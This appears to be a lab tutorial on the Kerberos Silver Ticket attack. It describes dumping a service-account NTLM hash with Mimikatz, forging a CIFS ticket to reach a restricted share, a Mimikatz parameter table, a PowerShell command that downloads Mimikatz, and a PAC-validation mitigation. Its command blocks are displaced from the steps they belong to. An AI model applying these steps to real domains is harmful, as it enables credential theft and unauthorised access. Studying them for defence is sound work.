A Silver Ticket is a forged Ticket Granting Service (TGS) ticket. Unlike a Golden Ticket (which is a TGT signed by the krbtgt hash), a Silver Ticket is signed and encrypted using the hash of a service account (such as HOST, CIFS, HTTP, etc.).
Key Characteristics
Signed using the service account hash (e.g., the machine account of the server offering the service).
Valid only for the specific service (not valid for Kerberos authentication in general like a TGT).
Most services do not validate the PAC (Privileged Attribute Certificate), so a forged TGS is often accepted.
No contact with a Domain Controller is needed to use a Silver Ticket, it can be forged offline, which makes it stealthier.
Silver Tickets can be used for long-term persistence, especially when targeting services tied to computer accounts (valid for 30 days by default).
To create a silver ticket we need the following requirements:
Domain name
Domain SID
SPN of the service to attack
NTLM hash of the service account to attack
Privilege Account Certificate (PAC) validation is disabled
Differences between Golden and SIlver tickets
Golden ticket requires NTLM hash of the KRBTGT account, while Silver ticket requires NTLM hash of a service account
Silver ticket can be forged offline without prior communication with the KDC/AS.
Attack Worflow
Attacker obtains NTLM password hash of a service account
Using the NTLM hash, a malicious TGS is created, bypassing normal Kerberos flow
Using the forged ticket it becomes possible to authenticate to the service.
1 - Leak NTLM hash of a service account
Mimikatz
Download and extract Mimikatz:
and run it to leak the NTLM hash of the machine account:
or if we've already an access to machine (eg. reverse shell) we can execute whoami /user (excluding the last 4 chars, eg. -500): S-1-5-21-1954621190-1971745961-1283776715
3 - Forge the Silver ticket
Actually, we've all info needed to forge the Silver ticket.
Let's assume we've a low privileged access to a workstation joined into the domain, in my case i log into: dev-angelist\devan's account.
and consider that there's a SMB share at corp-dc.dev-angelist.lab/SharedFiles which contains a file named secrets.txt, we aren't able to access it:
Let's download Mimikatz on our devan's machine to generate a new Silver ticket which give us access to Shared folder with administrative right:
Download and extract Mimikatz:
Generate a Silver ticket (kerberos::golden regards Silver ticket in this case), the command below contain all requirements needed:
NTLM hash of the machine account -> 11bc07660f7c9a2d8f7cead855b8c72b
Service name -> Cifs
id -> 500 (administrator id)
Exit to mimikatz and check the ticket using klist:
Add DC host info: 192.168.57.9 corp-dc.dev-angelist.lab corp-dc into hosts file (opening notepad as administrator)
Now, we can retry to access SharedFiles and see secret.txt file:
Using Safetykatz
It's possibile to forge TGS tickets for other services as well (e.g., HOST, RPCSS, HTTP, etc.) as long as you have the corresponding service account hash.
Parameters Explained (Mimikatz Syntax)
Option
Description
kerberos::golden
Mimikatz module used to forge the ticket. There is no silver module—Silver Ticket is technically a forged TGS.
/user:Administrator
The user to impersonate.
/domain:dollarcorp.moneycorp.local
FQDN of the target domain.
/sid:S-1-5-21-...
SID of the domain.
/target:dcorp-dc.dollarcorp.moneycorp.local
FQDN of the target server hosting the service.
/service:CIFS
Service Principal Name (SPN) to forge the TGS for.
/rc4:<hash> or /aes256:<key>
Hash or AES key of the service account.
/id, /groups
Optional: RID and group IDs of the user.
/startoffset:0
When the ticket becomes valid (in minutes from now; 0 = now). Use negative for backdating.
/endin:600
Ticket lifetime in minutes (default = 600 mins = 10 hours).
/renewmax:10080
Maximum renewable lifetime in minutes (default = 7 days).
/ptt
Inject the ticket into the current process. No need to write to disk.
Using Rubeus
To protect against this attacks:
Enable PAC validation with the domain controller, because PAC represents a critical section af a Kerberos ticket that contains info about the user requesting ticket (User SID, Group membership, User rights and privileges and authorization data).
User Name SID
========================== =============================================
dev-angelist\administrator S-1-5-21-1954621190-1971745961-1283776715-500
whoami
hostname
dir \\corp-dc.dev-angelist.lab\SharedFiles
iwr -uri https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip -Outfile mimikatz_trunk.zip
Expand-Archive -Path 'mimikatz_trunk.zip'
cd .\mimikatz_trunk\
#Win32 Folder in this case, because this machine is 32bit
